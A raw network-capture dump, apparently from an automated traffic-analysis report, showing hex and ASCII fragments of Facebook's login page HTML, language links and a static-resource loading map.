                                                                                                                                                                                    2023-01-05 08:00:19 UTC19834INData Raw: 6c 20 6f 72 20 70 68 6f 6e 65 20 6e 75 6d 62 65 72 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20 5f 35 34 36 36 20 5f 34 34 6d 67 22 3e 3c 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 35 35 72 31 20 5f 31 6b 62 74 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 74 65 78 74 20 5f 35 35 72 31 20 69 6e 70 75 74 74 65 78 74 20 5f 39 6e 70 69 20 69 6e 70 75 74 74 65 78 74 20 5f 39 6e 70 69 22 20 6e 61 6d 65 3d 22 70 61 73 73 22 20 69 64 3d 22 70 61 73 73 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 50 61 73 73 77 6f 72 64 22 20 76 61 6c 75 65 3d 22 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 63 75 72 72
                                                                                                                                                                                    Data Ascii: l or phone number" /></div><div class="clearfix _5466 _44mg"><div><div class="_55r1 _1kbt"><input type="password" class="inputtext _55r1 inputtext _9npi inputtext _9npi" name="pass" id="pass" tabindex="0" placeholder="Password" value="" autocomplete="curr
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19835INData Raw: 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 68 61 64 5f 63 70 5f 70 72 65 66 69 6c 6c 65 64 22 20 6e 61 6d 65 3d 22 68 61 64 5f 63 70 5f 70 72 65 66 69 6c 6c 65 64 22 20 76 61 6c 75 65 3d 22 66 61 6c 73 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 68 61 64 5f 70 61 73 73 77 6f 72 64 5f 70 72 65 66 69 6c 6c 65 64 22 20 6e 61 6d 65 3d 22 68 61 64 5f 70 61 73 73 77 6f 72 64 5f 70 72 65 66 69 6c 6c 65 64 22 20 76 61 6c 75 65 3d 22 66 61 6c 73 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 61
                                                                                                                                                                                    Data Ascii: ype="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="a
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19837INData Raw: 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 64 65 5f 44 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 64 65 2d 64 65 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f
                                                                                                                                                                                    Data Ascii: nclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19838INData Raw: 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 70 74 5f 50 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 74 2d 70 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f
                                                                                                                                                                                    Data Ascii: acebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;en_US&quot;, &quot;https:\/\/pt-pt.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.co
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19840INData Raw: 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 2d 74 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 74 72 5f 54 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 74 72 2d
                                                                                                                                                                                    Data Ascii: ir="ltr" href="https://tr-tr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;en_US&quot;, &quot;https:\/\/tr-
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19841INData Raw: 22 20 74 69 74 6c 65 3d 22 48 69 6e 64 69 22 3e e0 a4 b9 e0 a4 bf e0 a4 a8 e0 a5 8d e0 a4 a6 e0 a5 80 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65
                                                                                                                                                                                    Data Ascii: " title="Hindi"></a></li><li><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookie
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19843INData Raw: 6f 75 72 20 57 61 74 63 68 20 76 69 64 65 6f 73 2e 22 3e 57 61 74 63 68 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6c 61 63 65 73 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 70 6f 70 75 6c 61 72 20 70 6c 61 63 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 6c 61 63 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 67 61 6d 65 73 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 67 61 6d 65 73 2e 22 3e 47 61 6d 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6d 61 72 6b 65 74 70 6c 61 63 65 2f 22 20 74 69 74 6c 65 3d 22 42 75 79 20 61 6e 64 20 73 65 6c 6c 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 20 4d 61 72 6b 65 74 70 6c
                                                                                                                                                                                    Data Ascii: our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketpl
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19844INData Raw: 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 63 65 6e 74 65 72 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 6d 61 6e 61 67 65 20 61 6e 64 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 70 72 69 76 61 63 79 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76 61 63 79 20 43 65 6e 74 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 67 72 6f 75 70 73 2f 65 78 70 6c 6f 72 65 2f 22 20 74 69 74 6c 65 3d 22 45 78 70 6c 6f 72 65 20 6f 75 72 20 47 72 6f 75 70 73 2e 22 3e 47 72 6f 75 70 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61
                                                                                                                                                                                    Data Ascii: rivacy Policy</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19845INData Raw: 37 61 30 31 0d 0a 6b 69 65 73 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 34 31 75 67 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 68 65 6c 70 2f 35 36 38 31 33 37 34 39 33 33 30 32 32 31 37 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 41 64 20 43 68 6f 69 63 65 73 2e 22 3e 41 64 20 63 68 6f 69 63 65 73 3c 69 20 63 6c 61 73 73 3d 22 69 6d 67 20 73 70 5f 68 34 53 77 72 63 38 74 69 57 4a 20 73
                                                                                                                                                                                    Data Ascii: 7a01kies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about Ad Choices.">Ad choices<i class="img sp_h4Swrc8tiWJ s
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19846INData Raw: 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 74 67 64 6f 62 69 45 6f 43 35 71 4f 41 4a 5f 59 22 7d 2c 22 33 37 37 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 34 41 6b 33 42 49 4a 42 5a 4f 51 7a 4a 2d 30 75 59 22 7d 2c 22 31 39 30 38 31 33 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6d 69 47 79 70 4a 6c 33 6d 32 41 71 34 55 4d 59 22 7d 2c 22 35 32 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 53 4c 4e 52 65 67 31 69 6a 68 33 62 5a 61 4d 63 22 7d 2c 22 38 31 39 32 33 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 36 76 57 38 36 64 32 75 4a 2d 6b 58 50 48 37 49
                                                                                                                                                                                    Data Ascii: esult":false,"hash":"AT7tgdobiEoC5qOAJ_Y"},"3774":{"result":true,"hash":"AT4Ak3BIJBZOQzJ-0uY"},"1908135":{"result":false,"hash":"AT6miGypJl3m2Aq4UMY"},"524":{"result":false,"hash":"AT6SLNReg1ijh3bZaMc"},"819236":{"result":false,"hash":"AT66vW86d2uJ-kXPH7I
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19848INData Raw: 2f 65 6e 5f 55 53 5c 2f 62 4c 58 4a 54 76 48 72 37 55 46 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 2b 43 45 6a 62 42 79 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6f 5c 2f 72 5c 2f 43 78 73 55 33 34 2d 6f 39 51 58 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 53 67 44 30 47 31 71 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 75 5c 2f 72 5c
                                                                                                                                                                                    Data Ascii: /en_US\/bLXJTvHr7UF.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"+CEjbBy":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yo\/r\/CxsU34-o9QX.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"SgD0G1q":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yu\/r\
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19849INData Raw: 76 33 5c 2f 79 4c 5c 2f 72 5c 2f 6d 50 51 54 78 41 56 42 37 41 4b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 65 39 41 4e 7a 77 5c 2f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 50 77 4c 34 5c 2f 79 62 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 4e 31 50 6d 6f 37 47 65 6c 6b 48 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 67 63 44 34 4e 63 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63
                                                                                                                                                                                    Data Ascii: v3\/yL\/r\/mPQTxAVB7AK.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"e9ANzw\/":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iPwL4\/yb\/l\/en_US\/N1Pmo7GelkH.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"gcD4NcR":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19851INData Raw: 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 45 5f 67 34 5c 2f 79 42 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 70 73 75 78 4d 38 53 59 6d 57 39 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 69 62 4e 44 63 63 78 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 50 69 50 34 5c 2f 79 58 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 31 70 79 4f 36 2d 6e 4b 5a 68 75 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6d 30 7a 4c
                                                                                                                                                                                    Data Ascii: ,"src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iE_g4\/yB\/l\/en_US\/psuxM8SYmW9.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"ibNDccx":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iPiP4\/yX\/l\/en_US\/1pyO6-nKZhu.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"m0zL
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19852INData Raw: 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 75 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 65 61 68 68 4b 49 37 47 2d 69 37 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 76 70 74 55 4a 79 38 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 39 78 67 34 5c 2f 79 52 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 69 56 68 41 36 31 55 63 66 64 54 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 33 6d 63 36 79 62 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a
                                                                                                                                                                                    Data Ascii: bcdn.net\/rsrc.php\/v3\/yu\/l\/0,cross\/eahhKI7G-i7.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"vptUJy8":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i9xg4\/yR\/l\/en_US\/iVhA61UcfdT.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"3mc6ybv":{"type":"js","src":"https:
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19854INData Raw: 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 68 5c 2f 72 5c 2f 67 53 48 33 7a 32 62 35 2d 4d 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 77 4b 49 32 2b 6a 30 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 65 58 75 34 5c 2f 79 61 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 41 77 57 6f 6d 45 37 52 6f 50 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4b 56 2b 78 7a 43 55 22 3a 7b 22 74
                                                                                                                                                                                    Data Ascii: "js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/gSH3z2b5-Mv.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"wKI2+j0":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ieXu4\/ya\/l\/en_US\/AwWomE7RoPl.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"KV+xzCU":{"t
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19855INData Raw: 46 48 73 54 6b 42 5a 67 79 6c 6e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 64 52 36 75 38 53 70 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 34 5c 2f 72 5c 2f 41 56 68 64 70 45 2d 4d 74 64 41 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 5a 38 42 5c 2f 46 5a 47 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 36 41 6e 34 5c 2f 79 7a 5c 2f 6c 5c 2f 65
                                                                                                                                                                                    Data Ascii: FHsTkBZgyln.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"dR6u8Sp":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y4\/r\/AVhdpE-MtdA.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Z8B\/FZG":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i6An4\/yz\/l\/e
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19857INData Raw: 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 79 64 46 6f 6f 47 66 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 44 33 50 34 5c 2f 79 5a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 34 4a 4c 64 75 54 73 44 42 45 62 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 69 57 64 61 75 6b 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5f 5c 2f 72 5c 2f 69 4f 39 67 45 41 50 43 77 34 6d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33
                                                                                                                                                                                    Data Ascii: 5Kz","nc":1},"ydFooGf":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iD3P4\/yZ\/l\/en_US\/4JLduTsDBEb.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"iWdauk4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y_\/r\/iO9gEAPCw4m.js?_nc_x=Ij3
                                                                                                                                                                                    2023-01-05 08:00:19 UTC19858INData Raw: 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 71 5c 2f 72 5c 2f 56 65 47 5f 50 76 52 77 5f 54 39 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4c 42 47 7a 63 61 67 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 74 44 58 34 5c 2f 79 79 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 63 38 45 78 4b 6f 59 74 79 4c 55 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6e 4e 78 6a 46 2b 4e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a
                                                                                                                                                                                    Data Ascii: tatic.xx.fbcdn.net\/rsrc.php\/v3\/yq\/r\/VeG_PvRw_T9.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"LBGzcag":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3itDX4\/yy\/l\/en_US\/c8ExKoYtyLU.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"nNxjF+N":{"type":"js","src":"https:
